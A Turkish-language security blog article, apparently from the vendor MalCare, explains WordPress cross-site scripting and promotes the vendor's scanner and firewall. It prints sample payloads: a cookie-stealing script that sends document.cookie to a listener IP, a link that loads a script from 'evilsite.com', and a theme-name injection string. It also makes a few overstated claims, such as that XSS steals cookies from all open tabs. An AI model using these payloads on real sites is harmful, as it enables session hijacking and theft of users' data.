WordPress XSS Saldırıları: Nasıl Önlenir?

WordPress XSS için endişeleniyorsanız, paranoyak değil ihtiyatlı davrandığınızı söyleyerek başlayalım. Siteler arası komut dosyası çalıştırma güvenlik açığı yalnızca WordPress web siteleriyle sınırlı değildir, ancak yine de eşit derecede etkiler. En iyi savunma, bir güvenlik duvarı kurmak ve temalarınızı ve eklentilerinizi güncel tutmaktır.

Bu makalede, güvenlik açığının tam olarak ne olduğunu açıklayacağız – ve bize katlanın, teknikleşecek – böylece web sitenizin güvenliği hakkında bilinçli kararlar verebilirsiniz. Ayrıca kontrol etmenizi önerdiğimiz saldırıların nasıl önleneceğine dair eksiksiz bir kılavuzumuz var.

TL; DR: WordPress sitenizin saldırıya uğradığından şüpheleniyorsanız, kötü amaçlı yazılımı sitenizden hemen kaldırmak için MalCare yüklemenizi öneririz.

WordPress XSS nedir?

WordPress XSS, WordPress web sitesinde siteler arası komut dosyası çalıştırma güvenlik açığından yararlanılarak gerçekleştirilen bir kötü amaçlı yazılım saldırısıdır. WordPress web sitelerinin saldırıya uğramasının en yaygın yoludur, özellikle de XSS güvenlik açıklarına sahip çok sayıda eklenti olduğundan.

Peki, siteler arası komut dosyası oluşturma nedir?

Siteler arası komut dosyası çalıştırma veya XSS, bir web sitesinde yetkisiz JavaScript kodunun yürütülmesine izin veren bir güvenlik açığıdır. Aslında, bu en yaygın web sitesi güvenlik açığıdır ve bu güvenlik açığından yararlanan saldırılar birçok türde olabileceğinden yakalanması son derece zordur. Bu özellikle büyük ve karmaşık web siteleri için geçerlidir.

Birçok saldırı türü vardır, ancak netlik için iki kategoriye ayrılabilirler:

• Kötü amaçlı komut dosyası, tarayıcının istemci tarafında yürütülür;
• Veya kötü amaçlı komut dosyalarının sunucuda depolandığı ve yürütüldüğü ve ardından tarayıcı tarafından sunulduğu bir yer;

Her iki durumda da bilgisayar korsanı, verileri çalmak veya sitenin nasıl göründüğünü ve davrandığını değiştirmek için bir XSS saldırısı kullanabilir.

Bu, siteler arası komut dosyası çalıştırmanın basitleştirilmiş sürümüdür. Bu makalenin sonunda daha ayrıntılı bir açıklama bulabilirsiniz.

XSS saldırıları neden bu kadar yaygın?

WordPress eklentileri son derece karmaşık olabilir. Bazen WordPress'in kendisinden bile daha karmaşık. Daha fazla karmaşıklıkla, güvenlik sorunları olasılığı yalnızca artar. XSS saldırılarını, eklenti yazarının işini daha da zorlaştırmaya karşı korumak özellikle zordur.

Google, Apple, Facebook ve daha fazlası gibi özel güvenlik ekiplerine sahip en iyi web şirketlerinden bazıları bile bu tür saldırılardan zarar gördü. Çok daha az kaynakla bir WordPress eklentisine nasıl sızabileceğine dair bir bakış açısına sahip olmanıza yardımcı olacaktır.

Web sitem bir XSS saldırısına karşı savunmasız mı?

Bir güvenlik duvarınız varsa ve her şeyi güncel tutarsanız, olasılık önemli ölçüde daha düşüktür. Ancak bu tür saldırılara karşı kusursuz bir koruma olmadığını unutmayın. Bir bilgisayar korsanı tarafından istismar edilebilecek, herkese açık olmayan bir güvenlik açığı olabilir. Bu nedenle bir güvenlik önlemi olarak web sitenizi düzenli olarak tarayın.

Bu tür güvenlik açıklarının neden olduğu hasar, sorunun tam ayrıntılarına bağlı olsa da, en kötü durumda tüm site bilgisayar korsanları tarafından ele geçirilebilir. Bazı durumlarda, bilgisayar korsanları sitede küçük bir değişiklik yapabilir, hatta sitenizi kendi kötü niyetli sitelerine yönlendirebilir.

Başka bir deyişle, bilgisayar korsanları tarayıcınızı şu amaçlarla kullanabilir:

• Oturum Kimliğini koklayarak bir kullanıcının oturumunu ele geçirin
• Yetkisiz açılır pencereler ve yönlendirmeler yerleştirin
• Kimlik avı saldırılarını başlatın
• Kurbanın her tuş vuruşunu not eden keylogger'lar kurun
• Finansal bilgileri çalmak

Bu tür saldırılara karşı savunmanın tek bir yolu var. MalCare'in güvenlik duvarını hemen yükleyin.

Tüm XSS saldırıları eşit derecede tehlikeli midir?

Hayır. Bazı XSS ​​saldırıları, bilgisayar korsanına sitenize tam erişim sağlayabileceğinden çok daha tehlikelidir. Hackerlar daha sonra site ile istedikleri her şeyi yapabilirler.

Diğerleri, bilgisayar korsanlarının sitenin yalnızca küçük bir bölümünü değiştirmesine izin verir. Bu da ziyaretçilerinize sunulan kötü amaçlı yazılımlar ve daha fazlası için çok tehlikeli olabilir.

Bazı XSS ​​saldırılarında, bilgisayar korsanının sitenize katkıda bulunması gerekebilir. Bu durumda, ortaya çıkan tehlike çok daha düşüktür.

Bilgisayar korsanları bu tür güvenlik açıklarından nasıl yararlanır?

Çoğu bilgisayar korsanı, güvenlik açıklarını bulmak için otomasyon kullanır. Bundan sonra, sadece hack'i yürütme meselesi. Bazı durumlarda, tüm saldırı bir bot tarafından yapılabilir.

Bir bilgisayar korsanının siteler arası komut dosyası çalıştırmayı pratik bir şekilde kullanabileceği 5 temel yol olduğunu size önceden söyledik. Tüm bu varyantları tek tek inceleyelim.

#1 Kullanıcının oturumunu ele geçirme

Bir XSS saldırısının bir çereze nasıl erişebileceği hakkında biraz konuştuk. Şimdi, bir tanımlama bilgisi almanın en tehlikeli yanı, aynı saldırının bir kullanıcının oturum kimliğini ortaya çıkarabilmesidir.

Çoğu web sitesi, oturumları her kullanıcı için benzersiz bir tanımlayıcı olarak kullanır. Bu oturumlar, oturum çerezlerinde saklanır. Bunun gibi basit bir komut dosyası kullanarak:

http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<script>new Image().src=”http://192.168.149.128/bogus.php?output=”+document.cookie;</ komut dosyası>

Bir bilgisayar korsanı, oturum çerezini http://192.168.149.128/ sitesine gönderebilir ve bu istek sunucudaki access.log dosyasına kaydedilir.

Artık, bu oturum bilgilerini kullanarak, bilgisayar korsanı, oturum açtığınız herhangi bir hesaba şifreye ihtiyaç duymadan kolayca giriş yapabilir.

#2 Yetkisiz faaliyetler gerçekleştirin

Bilgisayar korsanının çerezi çalmak için Javascript kullanamadığı belirli durumlar vardır. Bu durumda yetkisiz faaliyetler gerçekleştirmek için XSS saldırılarını kullanmaya çalışırlar. Örneğin, blog gönderinizin yorumlarında görünen ve yayınlanmaya devam eden bir mesaj.

Bu tür bir saldırı, sitenin tahrif edilmesi veya giderek daha fazla kullanıcıya yayılmaya devam eden kötü niyetli bir komut dosyası şeklini alabilir.

#3 Kimlik avı saldırıları

Çoğu durumda, bir WordPress XSS saldırısı, çok daha büyük bir planın yalnızca başlangıç ​​noktasıdır. Sitenizde kimlik avı saldırılarına yol açan siteler arası komut dosyaları da vardır. Çoğu durumda, kötü amaçlı komut dosyası, kullanıcılarınızı hassas bilgilerini vermeleri için kandıracak kimlik avı dolandırıcılıklarını sitenize göndermeye başlar.

Kimlik avı saldırıları hakkında tam bir makalemiz var, bu yüzden daha fazlasını öğrenmek istiyorsanız bunu okuyun.

#4 Keylogger yükleme

Bu saldırı senaryosunda, bilgisayar korsanı, güvenlik açığı bulunan bir siteye bir keylogger yükleyen bir komut dosyası uygular. Bir kullanıcı bir şey yazdığında, keylogger bunu saklar ve bilgisayar korsanına geri gönderir. Bu tehlikeli bir saldırıdır ve şifreleri ve kredi kartı bilgilerini anında çalabilir.

JavaScript dosyası aşağıdaki kodu içerir:

Bu kodda Javascript'in 'keylog.php' adında bir dosya açtığını göreceksiniz. Bu dosyadaki kod, kullanıcının klavyesi tarafından basılan tüm tuşları data.txt adlı bir dosyaya kaydeder.

Bu tekniği kullanarak, bir bilgisayar korsanı, virüslü bir sitede tam olarak ne yazdığınızı kolayca okuyabilir.

#5 Hassas Bilgilerin Çalınması

Çerezler ve nasıl çalınabilecekleri hakkında zaten biraz konuştuk. Bu tür bir saldırı, aynı prensibi daha da ileri götürür.

Bankanızın internet bankacılığı sayfasının XSS saldırılarına karşı savunmasız olduğunu hayal edin. Doğru komut dosyasını kullanarak, bilgisayar korsanı herhangi bir doğrulama yapmadan doğrudan banka hesabınıza giriş yapabilir!

Yine, bu yeni bir kavram değil. Bu, bir bilgisayar korsanının oturum tanımlama bilgileriyle yapabileceklerinin yalnızca bir uzantısıdır.

XSS saldırılarından nasıl korunuruz?

Güvenlik duvarları, sürekli gelişen bir tehdit karşısında en iyi savunmanızdır.

Güvenlik duvarlarının, genellikle XSS saldırılarında bulunan şüpheli metin içerebilen istekleri arayan özel kuralları vardır. Sorun şu ki, bilgisayar korsanları, en akıllı güvenlik duvarlarından bazılarını atlayabilecek bu kötü amaçlı metnin daha akıllı varyasyonlarını bulmaya devam ediyor.

Yine de bu her zaman en iyi çözüm değildir. Bu bir kedi ve fare oyunudur ve çoğu zaman bazı yanlış pozitifler getirebilir.

Kesinlikle kontrol etmeniz gereken bir WordPress sitesinin nasıl güvenli hale getirileceğine dair bir makalemiz var.

Sitenizde bir WordPress XSS saldırısı nasıl tespit edilir

Sitenizdeki bir XSS saldırısını tespit etmenin en basit yolu MalCare gibi bir güvenlik eklentisi yüklemektir. MalCare, tüm sitenizi her gün tarayan otomatik bir kötü amaçlı yazılım tarayıcısına sahiptir. En iyi makine öğrenimi algoritmasıyla kötü amaçlı yazılım tarayıcısı, sitenizin herhangi bir yerindeki kötü amaçlı komut dosyalarını algılar.

MalCare, bilinmeyen kötü amaçlı yazılımları bile bulur ve size bir 'Otomatik Temizleme' seçeneği sunar.

Tabii ki, yapılacak en mantıklı şey, ilk etapta böyle bir hack olayına asla izin vermemektir. Ancak XSS saldırılarına karşı korunmak inanılmaz derecede zordur. Yapabileceğiniz en iyi şey, WordPress güvenliğinizi güçlendirmektir.

Ayrıca MalCare'in Gelişmiş Güvenlik Duvarından en iyi şekilde yararlanabilirsiniz. MalCare'in güvenlik duvarı, şüpheli veya kötü niyetli IP adreslerinin sitenize bağlanmasını otomatik olarak engeller.

En iyi kısım? MalCare'in koruduğu 250.000'den fazla siteden herhangi birinde bir bilgisayar korsanının IP'si her tespit edildiğinde, bu IP adresi MalCare'in koruması altındaki her sitede yasaklanır.

Ekip üyelerinizin ip adresi veya web sitesi yöneticisinin yanlışlıkla siteye erişimi engellenirse endişelenmeyin! Bir ip adresinin nasıl beyaz listeye alınacağına ilişkin kılavuzumuza göz atın.

XSS nasıl çalışır?

Bilgisayar korsanının ne tür bir saldırı başlattığına bağlı olarak, farklı siteler arası komut dosyası çalıştırma türleri vardır. Hepsinin ortak bir yanı var – hepsi kötü amaçlı yazılımları yaymak için Javascript kullanıyor.

Javascript, web sayfaları için HTML kodu arasında yer alan bir dildir. Artık Javascript, son derece güçlü hesaplamalar gerçekleştiren değişkenler oluşturma yeteneğine sahiptir. Bu nedenle, hayal edebileceğiniz hemen hemen her şeyi yapmak için kullanabilirsiniz.

Örneğin, ödeme ayrıntılarını kabul eden ve bunları WordPress veritabanında saklayan bir WooCommerce web siteniz olduğunu varsayalım. Kredi kartı bilgilerini ve oturum açma verilerini başka birine göndermek için Javascript'i kullanabilirsiniz!

Bu nedenle, bir bilgisayar korsanı Javascript'i yürütmek için sitenizin kodundaki bir güvenlik açığından yararlandığında, bu bir XSS saldırısıdır. Tipik olarak, bu tür bir güvenlik açığı, sitenizde bir kullanıcının veri girebildiği herhangi bir yerde oluşur. Buna pop-up'lar, formlar, arama çubukları ve hatta URL'leriniz dahildir.

Şimdi, bu veri giriş alanı görsel bir alan olmak zorunda değil. Herhangi bir dosya veya veritabanından temizlenmemiş verileri alan sitenizin kodunda hatalı bir değişken bile olabilir.

WordPress çekirdeği ayrıca XSS saldırılarına karşı savunmasızdı. Başlangıçta, bir bilgisayar korsanının XSS'yi yürütmek için yapması gereken tek şey, içinde aşağıdaki kod satırlarını içeren bir PHP dosyası oluşturmaktı:

/* Şablon Adı: <script>confirm(document.cookie);</script> */

Bunu parçalayalım.

Bu kod parçası sadece dosyanın adını bildiren bir yorumdur. Kendi başına, iyi huyludur ve WordPress tarafından göz ardı edilir.

Ancak yorumun içinde, 'Şablon Adı:' sonrasında '<script>' ile başlayan ve '</script>' ile biten bir kod parçası olduğunu fark edeceksiniz. Bu, çerezi getirmeye ve tarayıcınızda bir onay kutusu görüntülemeye çalışan bir Javascript kodudur.

Bu bir WordPress XSS saldırısı örneğidir.

WordPress'in daha eski bir sürümü, şablon adı WordPress Tema Düzenleyicisi tarafından olduğu gibi getirileceği için bunu hemen çalıştırırdı. Tema Düzenleyici, XSS saldırılarına karşı herhangi bir önlemi olmayan bir '$file_description' işlevi kullanarak şablon adını getirdi.

Tabii ki, yukarıdaki örnekteki komut dosyası o kadar güçlü veya kötü niyetli değil. Ama mesele aynı kalıyor. Herhangi bir giriş alanında iyi niyetli kod çalıştırılabiliyorsa, kötü amaçlı kod da çalıştırılabilir!

Bu özel hack, WordPress 4.8.2 sürümünde yamalandı, ancak aynı güvenlik açığı birçok WordPress temasında ve eklentisinde var.

Aslında, bu birçok WordPress eklentisinde büyük bir sorundur. Gerçek şu ki, çoğu eklenti aşırı derecede karmaşık olabilir. Bazıları WordPress çekirdek dosyalarından bile daha karmaşıktır. Bu karmaşıklık derecesi genellikle güvenlik sorunlarına neden olabilir.

Ve WordPress XSS böyle çalışır. WordPress'in daha eski bir sürümünü çalıştırıyorsanız, hemen güncellemenizi öneririz.

Ayrıca, burada XSS güvenlik açıklarına sahip olduğu bilinen WordPress eklentilerinin bir listesi bulunmaktadır. Bunlardan mümkün olduğunca uzak durmanızı şiddetle tavsiye ederiz. Bu eklentilerden birini kullanıyorsanız, güvenlik açığını gideren ve en son sürüme güncelleyen bir güncellemeleri olup olmadığını öğrenin.

Siteler Arası Komut Dosyası Türleri

Öncelikle öğrenmeniz gereken iki tür XSS Saldırısı vardır:

• Depolanmış veya Kalıcı XSS ​​Saldırısı – Bu saldırının hedefi web sitenizin ziyaretçisidir. Müşterileri dolandırıyorlar, özel bilgilerini ve fonlarını çalıyorlar.
• Yansıtıcı veya Kalıcı Olmayan XSS Saldırısı – Hedef, WordPress web sitenizdir.

Her iki saldırıyı da ayrıntılı olarak açıklayacağız.

Depolanmış veya Kalıcı XSS ​​Saldırısı

Web sitenizin, insanların yayınladığınız makaleler hakkında yorum yapmasına izin veren bir blog olduğunu varsayalım. Bir ziyaretçi yorum bıraktığında, veriler veritabanına gönderilir ve saklanır.

Siteniz, verileri veritabanına gönderilmeden önce sterilize etmek için yapılandırmalara sahip olmalıdır. Bu, kullanıcının girdiğinin normal bir yorum mu yoksa kötü amaçlı bir komut dosyası mı olduğunu kontrol etmesi gerektiği anlamına gelir. Bu kontroller yerinde değilse, bir WordPress XSS kusuru açar. Nasıl olduğunu görelim:

1. Adım: Hacker, Güvenlik Açığını Buluyor ve Bunu Sömürüyor

Bilgisayar korsanları, internette gezinmek ve XSS güvenlik açığı olan web sitelerini bulmak için otomatik tarayıcılar kullanır. Sitenizi bulduklarında, yorum bölümünüze kötü amaçlı komut dosyaları girerler. Web sitenizde herhangi bir kontrol bulunmadığından, komut dosyasını kabul eder ve veritabanına gönderir.

2. Adım: Bir Ziyaretçi Etkilenen Sayfayı Görüntüler

Bir ziyaretçiye, bilgisayar korsanının girişi normal bir yorum gibi görünür. Ziyaretçinin ve web sitesi sahibinin bilmediği şey, bu yorumun çerezleri çalmak için tasarlanmış yürütülebilir bir kod olduğudur. Bu sayfayı ziyaret eden herkes etkilenecektir.

3. Adım: Hacker Tarayıcı Çerezlerini Çalıyor

Normal kullanıcıların genellikle e-posta, Facebook, Amazon gibi bir alışveriş sitesi, bir iş sitesi, YouTube vb. gibi bir tarayıcıda birden fazla sekme açık olduğunu biliyoruz.

Web sitenizi ziyaret ettiklerinde ve bilgisayar korsanının yorumuyla sayfayı görüntülediklerinde, kod yürütülür. Bu, bilgisayar korsanının tarayıcı çerezlerini çalmasını sağlar. Bu saldırıya 'cross-site' denir çünkü farklı sekmelerde açık olan tüm sitelerin çerezlerini çalabilirler.

Adım 4: Hacker, Çalınan Çerezlerden Yararlanıyor

Daha sonra, bilgisayar korsanları bu çerezleri kullanarak alışveriş sitesinde kimliği doğrulanmış kullanıcılar gibi davranabilir ve alışveriş yapabilir. Saldırganlar, kullanıcı adları ve şifreler gibi hassas hesap bilgilerini çalabilir. Ayrıca e-postanızı hackleyebilir ve kişilerinize kimlik avı veya dolandırıcılık amaçlı e-postalar gönderebilirler. Liste sonsuz.

Bu tür bir saldırı, web sitenizi ziyaret eden herkesi tehlikeye atar. Bir sonraki XSS saldırısı türünde doğrudan web sitesini hedef alır.

Yansıtıcı veya Kalıcı Olmayan XSS Saldırısı

Bir önceki saldırıda, bilgisayar korsanlarının ziyaretçileri nasıl hedeflediğini gördük. Ancak bu saldırıda bilgisayar korsanları web sitesinin kendisine bulaşır. Daha önce de belirttiğimiz gibi, çoğu internet kullanıcısı tarayıcılarında birden fazla sekme açmaktadır.

Aynı durum web sitesi sahipleri için de geçerlidir.

Çoğu zaman, WordPress yönetici kullanıcı panonuz, tarayıcınızda açık olan sekmelerden yalnızca biridir. Bu, yansıtıcı bir XSS saldırısını mümkün kılar.

Bunun nasıl olduğunu göstereceğiz:

1. Adım: Site Sahibinin Kötü Amaçlı Bir Bağlantıya Tıklamasını Sağlamak

Çoğu zaman, bilgisayar korsanları, birinin hilelerine düştüğünü umarak e-postalar aracılığıyla kötü niyetli bağlantılar gönderir. Diğer durumlarda, bilgisayar korsanları bu kötü amaçlı bağlantıları diğer WordPress sitelerine yerleştirir.

Bağlantıya tıkladığınızda, web sitenize harici bir web sitesinden bir komut dosyası yüklenmesine neden olur. Bu bağlantı şöyle bir kod içeriyor:

https://yoursite.com/test.php?val=<script src=”http://evilsite.com/badscript.js”></script>

2. Adım: Oturum Çerezlerini Alın

Bağlantıya tıklayarak kodu çalıştırıyorsunuz. Bu, bilgisayar korsanlarının çerezlerinizi çalmasına ve WordPress sitenizin yönetici hesabında oturum açmış bir kullanıcı gibi davranmasına olanak tanır. Sitenize erişim sağladıklarında, oturum açma kimlik bilgilerini ve hassas verileri çalabilir, sizi kendi web sitenizin dışında tutabilir ve farklı türde saldırılar gerçekleştirmek için kullanabilirler.

XSS saldırıları ciddi sonuçlar doğurur ve web sitenize ve işinize zarar verir. Böyle bir saldırıdan kurtulmak çok fazla zaman ve para harcar. XSS'e karşı önlem alarak mağdur olmaktan kurtulabilirsiniz.

Sıradaki ne?

Bir sonraki adım her zaman gelecekteki saldırılara karşı koruma kurmaktır. Bunu söylemenin güzel bir yolu yok ama sitenizi siber suçlara karşı korumanın kusursuz bir yolu yok. Şimdilik önerebileceğimiz en iyi şey, rutin WordPress güvenlik denetimleri etrafında bir sürece sahip olmaktır.

WordPress XSS saldırılarının nasıl önleneceğine dair tam bir makalemiz var. Bu nedenle, o makaleye gitmenizi ve siteniz şu anda saldırıya uğradıysa bunu okumanızı öneririz.

Ayrıca MalCare'i hemen şimdi yükleyebilirsiniz. Site güvenliğinizi artırmak için ihtiyaç duyacağınız kirli işlerin çoğunu otomatikleştirir.

SSS